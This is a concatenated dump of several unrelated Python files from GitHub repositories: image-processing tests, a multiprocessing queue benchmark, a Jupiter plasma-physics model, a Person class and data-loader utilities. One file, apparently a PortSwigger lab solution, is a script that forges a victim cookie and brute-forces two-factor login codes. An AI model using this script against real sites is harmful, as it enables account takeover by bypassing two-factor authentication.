\"float\")\n self.assertAlmostEqual(C.mean(), m)\n\n def test_convert_toFloat(self):\n L = dh.data.lena()\n\n # test conversion to float\n C = dh.image.convert(L, \"float\")\n self.assertEqual(C.shape, (512, 512, 3))\n self.assertEqual(C.dtype, np.float)\n self.assertAlmostEqual(C.mean(), 0.50285637550104678)\n\n def test_colorize(self):\n I = dh.data.lena()\n C = dh.image.colorize(I, \"jet\")\n self.assertEqual(I.shape, C.shape)\n self.assertEqual(C[128, 256, 1], 174)\n self.assertEqual(C[256, 128, 2], 64)\n ms = (180.22365951538086, 99.051216125488281, 105.41025161743164)\n for nChannel in range(3):\n mHat = I[:, :, nChannel].mean()\n self.assertAlmostEqual(mHat, ms[nChannel])\n\n def test_colorize_all(self):\n \"\"\"\n Colorize slope image with all available colormaps\n \"\"\"\n\n # slope image\n I = np.arange(256).reshape(1, -1).astype(\"uint8\")\n self.assertEqual(I.shape, (1, 256))\n\n # use each colormap...\n cs = dh.data.colormaps()\n self.assertIsInstance(cs, dict)\n self.assertGreaterEqual(len(cs), 75)\n for (cName, c) in cs.items():\n # ... to colorize the slope and check the result\n C = dh.image.colorize(I, c)\n self.assertEqual(I.shape + (3,), C.shape)\n for nPixel in range(256):\n if nPixel in c:\n # check colorized result vs. colormap\n for nChannel in range(3):\n self.assertEqual(C[0, nPixel, nChannel], c[nPixel][nChannel])\n else:\n # no color available in colormap - should be colored as black\n for nChannel in range(3):\n self.assertEqual(C[0, nPixel, nChannel], 0)\n\n def test_gamma(self):\n I = dh.data.lena()\n G = dh.image.gamma(I, 0.5)\n self.assertEqual(I.shape, G.shape)\n self.assertAlmostEqual(G.mean(), 174.81550725301108)\n\n def test_resize(self):\n I = dh.data.lena()\n R = dh.image.resize(I, 0.5)\n self.assertEqual(R.shape, (256, 256, 3))\n\n def test_tir(self):\n self.assertEqual(\n dh.image.tir(np.array([-3.81, 2.97]) * 0.5),\n (-2, 1)\n )\n\n #def test_","repo_name":"dhaase-de/dh-python-dh","sub_path":"dh/tests/test_image.py","file_name":"test_image.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9265808530","text":"import multiprocessing as mp\nimport time\nfrom multiprocessing import Process\nfrom typing import Optional, Tuple\n\nimport matplotlib as mpl\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import FormatStrFormatter\n\nfrom treequeues import TreeQueue, SimpleTreeQueue\n\nNUM_ITEMS = 200\nQUEUE_MAXSIZE = 10\nMEGABYTES_LIST = [1., 5., 10., 20, 50, 100]\n\n\nclass CatchTime:\n def __enter__(self):\n self.initial_value = time.perf_counter()\n self.value: Optional[float] = None\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n self.value = time.perf_counter() - self.initial_value\n\n\nclass GetProcess(Process):\n def __init__(self, queue_data, queue_time: mp.Queue, barrier: mp.Barrier, num_iterations: int):\n super().__init__()\n self.queue_data = queue_data\n self.queue_time = queue_time\n self.barrier = barrier\n self.num_iterations = num_iterations\n\n def run(self):\n time_list = []\n self.barrier.wait()\n\n for i in range(self.num_iterations):\n start_time = time.perf_counter()\n self.queue_data.get()\n time_list.append(time.perf_counter() - start_time)\n for t in time_list:\n self.queue_time.put(t)\n self.queue_time.put(None)\n\n\nclass PutProcess(Process):\n def __init__(self, queue, barrier: mp.Barrier, num_iterations: int, data):\n super().__init__()\n self.queue = queue\n 
self.barrier = barrier\n self.num_iterations = num_iterations\n self.data = data\n\n def run(self):\n self.barrier.wait()\n for i in range(self.num_iterations):\n self.queue.put(self.data)\n\n\ndef get_tree(num_items: int, array_size: int):\n return {i: np.random.random(array_size) for i in range(num_items)}\n\n\ndef run_single_performance_test(\n num_processes: int,\n megabytes: int,\n num_tree_items: int,\n treequeue_type: str,\n maxsize: int = QUEUE_MAXSIZE\n) -> Tuple[float, float]:\n barrier = mp.Barrier(num_processes * 2)\n array_size = int(megabytes * 1_000_000 / (num_tree_items * 8))\n data = get_tree(num_tree_items, array_size)\n queue_time = mp.Queue()\n\n if treequeue_type == 'TreeQueue':\n queue_data = TreeQueue(data, maxsize=maxsize)\n elif treequeue_type == 'SimpleTreeQueue':\n queue_data = SimpleTreeQueue(data, maxsize=maxsize)\n elif treequeue_type == 'Queue':\n queue_data = mp.Queue(maxsize=maxsize)\n else:\n raise NameError\n\n process_list = []\n for _ in range(num_processes):\n process = GetProcess(\n queue_data=queue_data,\n queue_time=queue_time,\n barrier=barrier,\n num_iterations=int(NUM_ITEMS/num_processes),\n )\n process.start()\n process_list.append(process)\n\n process_list = []\n for _ in range(num_processes):\n process = PutProcess(\n queue=queue_data,\n barrier=barrier,\n num_iterations=int(NUM_ITEMS/num_processes),\n data=data,\n )\n process.start()\n process_list.append(process)\n\n for process in process_list:\n process.join()\n\n time_list = []\n none_counter = 0\n while none_counter < num_processes:\n data = queue_time.get()\n if data is None:\n none_counter += 1\n else:\n time_list.append(data)\n\n return float(np.mean(time_list)), float(np.std(time_list))\n\n\ndef run_benchmark_performance():\n plt.rc('text', usetex=False)\n plt.rc('font', family='serif')\n plt.rcParams['figure.dpi'] = 300\n mpl.rcParams.update({'font.size': 14})\n\n num_processes = 1\n megabytes_list = MEGABYTES_LIST\n\n fig, (axe_1, axe_2, axe_3) = plt.subplots(1, 3, figsize=(12.5, 4), sharey='all')\n\n experiences = {\n 'Queue': {\n '1 item': {'num_tree_items': 1, 'color': 'r', 'linestyle': '-', 'axe': axe_1},\n '10 items': {'num_tree_items': 10, 'color': 'r', 'linestyle': '-', 'axe': axe_2},\n '100 items': {'num_tree_items': 100, 'color': 'r', 'linestyle': '-', 'axe': axe_3},\n },\n 'TreeQueue': {\n '1 item': {'num_tree_items': 1, 'color': 'k', 'linestyle': '-', 'axe': axe_1},\n '10 items': {'num_tree_items': 10, 'color': 'k', 'linestyle': '-', 'axe': axe_2},\n '100 items': {'num_tree_items': 100, 'color': 'k', 'linestyle': '-', 'axe': axe_3},\n },\n }\n\n minimum = 1\n for queue_type, experience_dict in experiences.items():\n for experience_name, parameters in experience_dict.items():\n print(f'{queue_type}: {experience_name}')\n\n std_list = []\n mean_list = []\n for megabytes in megabytes_list:\n mean, std = run_single_performance_test(\n num_processes=num_processes,\n megabytes=megabytes,\n num_tree_items=parameters['num_tree_items'],\n treequeue_type=queue_type,\n )\n minimum = min(minimum, 0.4*mean)\n mean_list.append(mean)\n std_list.append(std)\n\n parameters['axe'].errorbar(\n megabytes_list, mean_list, std_list, ecolor=parameters['color'], color=parameters['color'],\n linestyle=parameters['linestyle'], linewidth=1.5, label=f'{queue_type}',\n capsize=3, capthick=1.5)\n parameters['axe'].set_yscale('log')\n parameters['axe'].set_xscale('log')\n parameters['axe'].grid(linestyle='dotted', )\n parameters['axe'].grid(linestyle='dotted')\n parameters['axe'].set_title(f'Nested 
array composed of {experience_name}', fontsize=14)\n parameters['axe'].tick_params(axis='both', which='both', labelsize=13)\n parameters['axe'].yaxis.set_tick_params(labelbottom=True)\n parameters['axe'].xaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n\n axe_2.set_xlabel(r'Nested array size (megabytes)', fontsize=13)\n axe_1.set_ylabel(fr'Time to send {NUM_ITEMS} nested arrays (s)', fontsize=13)\n axe_1.set_ylim(ymin=minimum)\n fig.suptitle('Queue performance (s) versus object size (megabytes)', y=0.96)\n handles, labels = plt.gca().get_legend_handles_labels()\n axe_3.legend(handles, labels, loc='lower right')\n plt.subplots_adjust(left=0.1, right=0.9, bottom=0.06, top=0.9)\n plt.tight_layout()\n plt.savefig('benchmark_performance.png', dpi=300)\n plt.show()\n\n\ndef run_benchmark_multiprocessing():\n plt.rc('text', usetex=False)\n plt.rc('font', family='serif')\n plt.rcParams['figure.dpi'] = 300\n mpl.rcParams.update({'font.size': 14})\n\n num_tree_items = 10\n megabytes_list = MEGABYTES_LIST\n\n fig, (axe_1, axe_2) = plt.subplots(1, 2, figsize=(8.5, 5), sharey='all')\n\n experiences = {\n 'Queue': {\n '1 process': {'num_processes': 1, 'color': 'r', 'linestyle': '-', 'axe': axe_1},\n '8 processes': {'num_processes': 8, 'color': 'r', 'linestyle': '-', 'axe': axe_2},\n },\n 'TreeQueue': {\n '1 process': {'num_processes': 1, 'color': 'k', 'linestyle': '-', 'axe': axe_1},\n '8 processes': {'num_processes': 8, 'color': 'k', 'linestyle': '-', 'axe': axe_2},\n },\n 'SimpleTreeQueue': {\n '1 process': {'num_processes': 1, 'color': 'b', 'linestyle': '-', 'axe': axe_1},\n '8 processes': {'num_processes': 8, 'color': 'b', 'linestyle': '-', 'axe': axe_2},\n },\n }\n\n minimum = 1\n for queue_type, experience_dict in experiences.items():\n for experience_name, parameters in experience_dict.items():\n print(f'{queue_type}: {experience_name}')\n\n std_list = []\n mean_list = []\n for megabytes in megabytes_list:\n with CatchTime() as ct:\n mean, std = run_single_performance_test(\n num_processes=parameters['num_processes'],\n megabytes=megabytes,\n num_tree_items=num_tree_items,\n treequeue_type=queue_type,\n )\n print(parameters['num_processes'], ct.value)\n\n minimum = min(minimum, 0.3*mean)\n mean_list.append(mean)\n std_list.append(std)\n\n parameters['axe'].errorbar(\n megabytes_list, mean_list, std_list, ecolor=parameters['color'], color=parameters['color'],\n linestyle=parameters['linestyle'], linewidth=1.5, label=f'{queue_type}',\n capsize=3, capthick=1.5)\n parameters['axe'].set_yscale('log')\n parameters['axe'].set_xscale('log')\n parameters['axe'].grid(linestyle='dotted')\n parameters['axe'].grid(linestyle='dotted')\n parameters['axe'].set_title(f'Experiment using {parameters[\"num_processes\"]*2} processes', fontsize=15)\n parameters['axe'].tick_params(axis='both', which='both', labelsize=13)\n parameters['axe'].yaxis.set_tick_params(labelbottom=True)\n parameters['axe'].xaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n\n axe_1.set_ylabel(fr'Time to send {NUM_ITEMS} nested arrays per process (s)', fontsize=13)\n fig.supxlabel(r'Nested array size (megabytes)', fontsize=13, y=0.066)\n axe_1.set_ylim(ymin=minimum)\n fig.suptitle('Queue performance (s) versus object size (megabytes)\\nwith nested arrays composed of 10 items', y=0.96)\n axe_2.legend(loc='lower right')\n plt.subplots_adjust(left=0.1, right=0.9, bottom=0, top=0.9)\n plt.tight_layout()\n plt.savefig('benchmark_multiprocessing.png', dpi=300)\n plt.show()\n\n\nif __name__ == '__main__':\n run_benchmark_performance()\n 
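The CatchTime context manager used in the benchmark above can also be used on its own; a small sketch, assuming the CatchTime class defined at the top of this file is in scope:

import time

with CatchTime() as ct:
    time.sleep(0.1)                      # stand-in for the benchmarked call
print(f'elapsed: {ct.value:.3f} s')      # ct.value is filled in __exit__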
run_benchmark_multiprocessing()\n","repo_name":"thomashirtz/treequeues","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"11958086840","text":"import numpy as np\nfrom Magnetic_field_models import field_models\n\n\n\ndef equatorialMagneticField(r, phi):\n \"\"\"\n Finds the equatorial magnetic field strength using Vogt et. al 2011 method\n :param r: The radius in R_J\n :param phi: The angle in radians, 0 at the Sun, anti-clockwise\n :return: The equatorial magnetic field in nT\n \"\"\"\n B = 1.030e6 * r ** (-3.756 - 0.12 * np.cos(phi - 3.562)) + \\\n (3.797 - 4.612 * np.cos(phi - 0.825) + 0.606 * np.cos(2 * (phi - 0.473)) +\n 0.847 * np.cos(3 * (phi - 0.913))) * np.exp((-1 * r) / 150)\n return B\n\n\ndef equatorialPlasmaNumberDensity(r, speciesValues=None):\n \"\"\"\n Calculates the plasma density at the equator using the method from Bagenal 2011\n :param r: The radius in R_J\n :param speciesValues:\n :return: The plasma number density at the equator in cm^-3\n \"\"\"\n b2011 = 1987 * (r / 6) ** (-8.2) + 14 * (r / 6) ** (-3.2) + 0.05 * (r / 6) ** (-0.65)\n\n try:\n percentage, a, b, c = speciesValues\n if r <= 15.2:\n n = a * (r / 6) ** b\n else:\n n = (c * b2011)\n except:\n n = b2011\n return n\n\n\ndef equatorialTotalPlasmaNumberDensity(r, species):\n \"\"\"\n Calculates the plasma density at the equator using the method from Bagenal 2011\n :param r: The radius in R_J\n :param species:\n :return: The plasma number density at the equator in cm^-3\n \"\"\"\n b2011 = 1987 * (r / 6) ** (-8.2) + 14 * (r / 6) ** (-3.2) + 0.05 * (r / 6) ** (-0.65)\n n = []\n for i in species:\n percentage, a, b, c = species[i]\n if r <= 15.2:\n n.append(a * (r / 6) ** b)\n else:\n n.append(c * b2011)\n\n totalN = np.sum(n)\n\n return totalN\n\n\ndef averageAmu(r, species, massAmuArray):\n \"\"\"\n\n :param r:\n :param species:\n :param massAmuArray:\n :return:\n \"\"\"\n sumofmasses = 0\n N = []\n for i in massAmuArray:\n mass = massAmuArray[i]\n try:\n n = equatorialPlasmaNumberDensity(r, species[i])\n N.append(n)\n except:\n n = 0\n print('Species do not match')\n sumofmasses += n * mass\n\n amu = sumofmasses/sum(N)\n return amu\n\n\ndef totalMassDensity(r, species, massAmuArray):\n \"\"\"\n\n :param r: radius in R_J\n :param species:\n :param massAmuArray: in AMU\n :return: Mass Density in kg/m^3\n \"\"\"\n M = 0\n for i in massAmuArray:\n mass = massAmuArray[i]\n try:\n n = equatorialPlasmaNumberDensity(r, species[i])\n except:\n n = 0\n print('Species do not match')\n M += n*1e6 * mass*1.67e-27\n\n return M\n\n\ndef alfvenVelocityAtRPhi(r, phi, species, massArray):\n \"\"\"\n\n :param r:\n :param phi:\n :param species:\n :param massArray:\n :return:\n \"\"\"\n\n Va = equatorialMagneticField(r, phi) * 1e-9 / np.sqrt(1.25663706212e-6 * totalMassDensity(r, species, massArray))\n\n return Va\n\n\ndef alfvenVelocityAtRThetaPhi(fieldModel, r, theta, phi, species, massArray, model='VIP4'):\n \"\"\"\n\n :param fieldModel:\n :param r:\n :param theta:\n :param phi:\n :param species:\n :param massArray:\n :param model:\n :return:\n \"\"\"\n\n Va = averageMagFieldModel(fieldModel, r, theta, phi, model) * 1e-9 / np.sqrt(1.25663706212e-6 * totalMassDensity(r, species, massArray))\n\n return Va\n\n\ndef corotationVelocityFunc(x, y):\n \"\"\"\n Calculate the corotational velocity at x and y\n :param x: In R_J\n :param y: In R_J\n :return: The corotation velocity 
assuming 10 hr rotation period in m/s\n \"\"\"\n v = (2*np.pi/(3600*9.9250)) * np.sqrt(x**2 + y**2) * 71492e3\n return v\n\n\ndef radialScaleHeight(r):\n \"\"\"\n Finds the scale height at a radius\n :param r: Radius in R_J\n :return: Scale height in R_J\n \"\"\"\n h = -0.116 + 2.14*np.log10(r/6) - 2.05*np.log10(r/6)**2 + 0.491*np.log10(r/6)**3 + 0.126*np.log10(r/6)**4\n H = 10 ** h\n return H\n\n\ndef densityAtZFromEquator(z, r, species):\n \"\"\"\n\n :param z:\n :param r:\n :param species:\n :return:\n \"\"\"\n\n nZ = equatorialTotalPlasmaNumberDensity(r, species) * np.exp(-1 * (z / radialScaleHeight(r)) ** 2)\n return nZ\n\n\ndef massDensityAtZFromEquator(r, z, species, massArray):\n \"\"\"\n\n :param z:\n :param r:\n :param species:\n :param massArray:\n :return:\n \"\"\"\n\n mZ = totalMassDensity(r, species, massArray) * np.exp(-1 * (z / radialScaleHeight(r)) ** 2)\n return mZ\n\n\ndef radialVelocityFunc(r, species, massArray):\n \"\"\"\n\n :param r:\n :param species:\n :param massArray:\n :return:\n \"\"\"\n vr = 500/(2 * totalMassDensity(r, species, massArray) *\n radialScaleHeight(r) * np.pi * r * 71492e3 ** 2)\n return vr\n\n\ndef radialVelocityFuncAtZ(r, z, species, massArray):\n \"\"\"\n\n :param r:\n :param species:\n :param massArray:\n :return:\n \"\"\"\n vr = 500/(2 * massDensityAtZFromEquator(r, z, species, massArray) *\n radialScaleHeight(r) * np.pi * r * 71492e3 ** 2)\n return vr\n\n\ndef magnitudeVector(x0, x1, x2):\n \"\"\"\n\n :param x0:\n :param x1:\n :param x2:\n :return:\n \"\"\"\n vector = [x0, x1, x2]\n return np.sqrt((np.square(vector)).sum())\n\n\ndef averageMagFieldModel(fieldObject, r, theta, phi, model='VIP4'):\n \"\"\"\n\n :param fieldObject:\n :param r:\n :param theta:\n :param phi:\n :param model:\n :return:\n \"\"\"\n br, bt, bp, bx, by, bz = fieldObject.Internal_Field(r, theta, phi, False, model)\n b = magnitudeVector(br, bt, bp)\n return b\n\n\n# Create a series of arrays to hold values\nxInRJ = []\nyInRJ = []\nzInRJ = []\nequatorialMagField = []\nnumberDensity = []\nradius = []\nalfvenVelocity = []\nalfvenPointCheck = []\nplasmaZDensity = []\nradiusForZDensity = []\nradialVelocity = []\nradialVelocityAtPi = []\nalfvenVelocityATPi = []\nradialVelocityAtZ = []\nalfvenVelocityAtZ = []\n\n# No longer have to be in the same order\nspeciesList = {'e-': [1, 2451, -6.27, 4.21],\n 'o+': [0.24, 592, -7.36, 0.368],\n 'o++': [0.03, 76.3, -6.73, 0.086],\n 's+': [0.07, 163, -6.81, 0.169],\n 's++': [0.22, 538, -6.74, 0.598],\n 's+++': [0.004, 90.7, -6.21, 0.165],\n 'h+': [0.02, 50.6, -5.31, 0.212],\n 'na+': [0.04, 97.2, -6.75, 0.106],\n 'hoto+': [0.06, 134, -4.63, 1.057]}\nME = 0.00054858\nspeciesMass = {'e-': 0.00054858,\n 'o++': 15.999 - (ME * 2),\n 's+': 32.065 - ME,\n 's++': 32.065 - (ME * 2),\n 's+++': 32.065 - (ME * 3),\n 'h+': 1.00784 - ME,\n 'na+': 22.989769 - ME,\n 'hoto+': 15.999 - (ME * 2),\n 'o+': 15.999 - ME\n }\n\nfieldGenerator = field_models()\n# Calculate radius, scale height, x, y, equatorial magnetic field, Alfven and radial velocity\n# and number density by iterating over radius and angle\nfor r in np.arange(6, 100, 0.5):\n radius.append(r)\n # scaleHeight.append(radialScaleHeight(r)) # No longer needed\n radialVelocityAtPi.append(radialVelocityFunc(r, speciesList, speciesMass))\n alfvenVelocityATPi.append(alfvenVelocityAtRPhi(r, 0, speciesMass, speciesMass))\n for phi in np.arange(0, 2 * np.pi + 0.03, 0.05):\n xInRJ.append(r * np.cos(phi))\n yInRJ.append(r * np.sin(phi))\n equatorialMagField.append(equatorialMagneticField(r, phi))\n 
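The Alfven speed computed above reduces to v_A = B / sqrt(mu_0 * rho); a sketch with the same mu_0 constant but made-up field and density magnitudes (not Jovian measurements):

import numpy as np

b_field = 400e-9   # magnetic field in tesla (400 nT), illustrative
rho = 2e-20        # mass density in kg/m^3, illustrative
v_a = b_field / np.sqrt(1.25663706212e-6 * rho)
print(f'{v_a:.3e} m/s')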
numberDensity.append(equatorialTotalPlasmaNumberDensity(r, speciesList))\n radialVelocity.append(radialVelocityFunc(r, speciesList, speciesMass))\n alfvenVelocity.append(alfvenVelocityAtRPhi(r, phi, speciesList, speciesMass))\n\n\n# Check if Alfven velocity is greater than radial, if so set a binary choice to 0\n# will be used to create a plot later\nfor i in range(len(alfvenVelocity)):\n if alfvenVelocity[i] > radialVelocity[i]:\n alfvenPointCheck.append(0)\n else:\n alfvenPointCheck.append(1)\n\nfor r in np.arange(6, 100, 0.5):\n for z in np.arange(-12, 12, 0.1):\n theta = np.arctan2(z, r)\n radiusForZDensity.append(r)\n zInRJ.append(z)\n plasmaZDensity.append(densityAtZFromEquator(z, r, speciesList))\n radialVelocityAtZ.append(radialVelocityFuncAtZ(r, z, speciesList, speciesMass))\n alfvenVelocityAtZ.append(alfvenVelocityAtRThetaPhi(fieldGenerator, r, theta, 0, speciesMass, speciesMass))\n\n\n# Save outputs\nnp.savetxt('alfvenCheck.txt', np.c_[xInRJ, yInRJ, equatorialMagField, numberDensity, alfvenVelocity, radialVelocity,\n alfvenPointCheck], delimiter='\\t', header='x\\ty\\tb\\tp\\tAlfven\\tCorotation\\tCheck')\n# np.savetxt('scaleheighttest.txt', np.c_[radius, scaleHeight], delimiter='\\t', header='r\\tscaleHeight')\n# No longer needed\n\nnp.savetxt('zPlasmaDensity.txt', np.c_[radiusForZDensity, zInRJ, plasmaZDensity, radialVelocityAtZ, alfvenVelocityAtZ], delimiter='\\t', header='r\\tz\\tplasmaZDensity')\n\nnp.savetxt('alfvenradial.txt', np.c_[radius, alfvenVelocityATPi, radialVelocityAtPi], delimiter='\\t', header='r\\tscaleHeight')","repo_name":"jenkins-andrew/Jupiter2DModel","sub_path":"creatingProfiles.py","file_name":"creatingProfiles.py","file_ext":"py","file_size_in_byte":9007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18357650762","text":"import requests\nfrom requests_toolbelt.utils import dump\nimport sys\n\n# 2fa_broken_logic_v1 is 'better' version because of fix (not allowing redirections)\n\nurl = ''\nsession_key = ''\n# not sure if this is correct approach but it worked\npath= '/login2'\n\nPROXIES = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\nHEADERS = {'Host': url,\n 'Cookie':'session='+session_key+'; verify=carlos',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Referer': url+path,\n 'Origin': url,\n 'Upgrade-Insecure-Requests': '1',\n 'Sec-Fetch-Dest': 'document',\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'same-origin'} \n\n\ndef logging_hook(response, *args, **kwargs):\n data = dump.dump_response(response)\n print(data.decode('utf-8'))\n \n\n\nhttp = requests.Session()\n# http.hooks[\"response\"] = [logging_hook]\n\n\ni = 0\nfor i in range(1000):\n r = http.post('https://'+url+path,headers=HEADERS, data='mfa-code='+str('{0:04}'.format(i)))\n sys.stdout.write('\\r'+str('{0:04}'.format(i)))\n sys.stdout.flush()\n# i was able to get 2fa code this way, not sure why in v1 using r.status_code or r.is_redirect or r.is_permanent_redirect did not confirm 302\n# fixed in v1, request returns status code from url user is redirected to\n\n if 'HTTP/1.1 302 Found' in dump.dump_all(r).decode('utf-8'):\n print(f' 2fa code is = {i}')\n break\n 
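The brute-force loop above submits zero-padded four-digit candidates, so the format spec is what keeps leading zeros; a quick check of what '{0:04}'.format produces:

codes = ['{0:04}'.format(i) for i in range(3)]
assert codes == ['0000', '0001', '0002']
assert '{0:04}'.format(9999) == '9999'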
","repo_name":"Kliprmimo/portswigger","sub_path":"2fa_broken_logic_v2.py","file_name":"2fa_broken_logic_v2.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33674550993","text":"import os\nimport uuid\n\n\nclass Person:\n\n def __init__(self, name, age, sex='M'):\n self.__name = name\n\n if not isinstance(age, int):\n raise ValueError(f\"invalid int for age: '{age}'\")\n elif age > 0:\n self.__age = age\n else:\n self.__age = 0\n\n self.__sex = sex\n self.__uuid = str(uuid.uuid4())\n\n def get_name(self):\n \"\"\"\n Getter Name\n :return: name of person\n :rtype: str\n \"\"\"\n return self.__name\n\n def set_name(self, value):\n \"\"\"\n Setter name\n :param value: name of person\n :type value: str\n :return: None\n :rtype: NoneType\n \"\"\"\n self.__name = value\n\n def get_age(self):\n \"\"\"\n Getter age\n :return: age of person\n :rtype: int\n \"\"\"\n return self.__age\n\n def set_age(self, value):\n \"\"\"\n Setter age\n :param value: age of person\n :type value: int\n :return: None\n :rtype: NoneType\n \"\"\"\n if not isinstance(value, int):\n raise ValueError(f\"invalid int for age: '{value}'\")\n elif value > 0:\n self.__age = value\n else:\n self.__age = 0\n\n def get_sex(self):\n \"\"\"\n Getter gender\n :return: gender of person\n :rtype: str\n \"\"\"\n return self.__sex\n\n def set_sex(self, value):\n \"\"\"\n Setter gender\n :param value: gender of person ('M', 'F', 'N')\n :type value: str\n :return: None\n :rtype: NoneType\n \"\"\"\n self.__sex = value\n\n def get_uuid(self):\n \"\"\"\n Getter uuid\n :return:UUID value\n :rtype: str\n \"\"\"\n return self.__uuid\n\n def __str__(self):\n \"\"\"\n String representation\n :return: human readable representation\n :rtype: str\n \"\"\"\n __str = 'Person: '\n __str += str(self.__name) + ', '\n __str += str(self.__age) + ', '\n __str += str(self.__sex) + ', '\n __str += str(self.__uuid)\n return __str\n\n def __repr__(self):\n \"\"\"\n repr() string representation\n :return: programmtic representation\n :rtype: str\n \"\"\"\n __str = \"{\"\n __str += f\"'name': {self.__name}, \"\n __str += f\"'age': {self.__age}, \"\n __str += f\"'sex': {self.__sex}, \"\n __str += f\"'uuid': {self.__uuid}\"\n __str += \"}\"\n return __str\n\n # Python attributes requires, property(fget=None, fset=None, fdel=None, doc=None)\n name = property(get_name, set_name, None, None)\n age = property(get_age, set_age, None, None)\n sex = property(get_sex, set_sex, None, None)\n uuid = property(get_uuid, None, None, None)\n","repo_name":"sjfke/python-projects","sub_path":"Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5315088884","text":"import os\nimport math\nimport time\nimport random\nimport numpy as np\nimport pickle as pkl\nfrom utils.savedir import *\n\nimport torch\nimport keras\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.datasets import mnist, fashion_mnist\nfrom sklearn.datasets import make_moons\nfrom pandas import DataFrame\nfrom torch.utils.data import DataLoader\n\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn.functional as F\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef execution_time(start, end):\n hours, rem = divmod(end - start, 3600)\n minutes, seconds = divmod(rem, 60)\n print(\"\\nExecution time = 
{:0>2}:{:0>2}:{:0>2}\".format(int(hours), int(minutes), int(seconds)))\n\n\n################\n# data loaders #\n################\n\ndef data_loaders(dataset_name, batch_size, n_inputs=None, channels=\"first\", shuffle=False):\n random.seed(0)\n # batch_size = 256\n\n if dataset_name == \"cifar\":\n\n data_dir=\"../../cifar-10/\"\n\n transform_train = transforms.Compose([\n # transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n target_transform = torchvision.transforms.Compose([lambda x:torch.tensor([x]), \n lambda x:F.one_hot(x,10),\n lambda x:x.squeeze()])\n\n trainset = torchvision.datasets.CIFAR10(root=data_dir, train=True, download=True, transform=transform_train,\n target_transform=target_transform)\n trainset = torch.utils.data.Subset(trainset, range(0, n_inputs)) if n_inputs else trainset\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True)\n\n testset = torchvision.datasets.CIFAR10(root=data_dir, train=False, download=True, transform=transform_test,\n target_transform=target_transform)\n testset = torch.utils.data.Subset(testset, range(0, n_inputs)) if n_inputs else testset\n test_loader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False)\n\n input_shape = next(iter(train_loader))[0].shape[1:]\n # print(next(iter(train_loader))[0].shape)\n # print(next(iter(train_loader))[1].shape)\n num_classes = 10\n else:\n\n x_train, y_train, x_test, y_test, input_shape, num_classes = \\\n load_dataset(dataset_name=dataset_name, n_inputs=n_inputs, channels=channels)\n\n train_loader = DataLoader(dataset=list(zip(x_train, y_train)), batch_size=batch_size, \n shuffle=shuffle)\n test_loader = DataLoader(dataset=list(zip(x_test, y_test)), batch_size=batch_size, \n shuffle=shuffle)\n\n return train_loader, test_loader, input_shape, num_classes\n\ndef classwise_data_loaders(dataset_name, batch_size, n_inputs=None, shuffle=False):\n random.seed(0)\n x_train, y_train, x_test, y_test, input_shape, num_classes = \\\n load_dataset(dataset_name=dataset_name)\n\n train_loaders = []\n test_loaders = []\n\n for label in range(num_classes):\n label_idxs = y_train.argmax(1)==label\n x_train_label = x_train[label_idxs]\n y_train_label = y_train[label_idxs]\n\n label_idxs = y_test.argmax(1)==label\n x_test_label = x_test[label_idxs]\n y_test_label = y_test[label_idxs]\n\n if n_inputs:\n x_train_label = x_train_label[:n_inputs]\n y_train_label = y_train_label[:n_inputs]\n x_test_label = x_test_label[:n_inputs]\n y_test_label = y_test_label[:n_inputs]\n\n train_loader = DataLoader(dataset=list(zip(x_train_label, y_train_label)), \n batch_size=batch_size, shuffle=shuffle)\n test_loader = DataLoader(dataset=list(zip(x_test_label, y_test_label)), \n batch_size=batch_size, shuffle=shuffle)\n\n train_loaders.append(train_loader)\n test_loaders.append(test_loader)\n\n return train_loaders, test_loaders, input_shape, num_classes\n\n\ndef load_half_moons(channels=\"first\", n_samples=30000):\n x, y = make_moons(n_samples=n_samples, shuffle=False, noise=0.1, random_state=0)\n x, y = (x.astype('float32'), y.astype('float32'))\n x = (x-np.min(x))/(np.max(x)-np.min(x))\n\n # train-test split\n split_size = int(0.8 * len(x))\n x_train, y_train = x[:split_size], y[:split_size]\n x_test, 
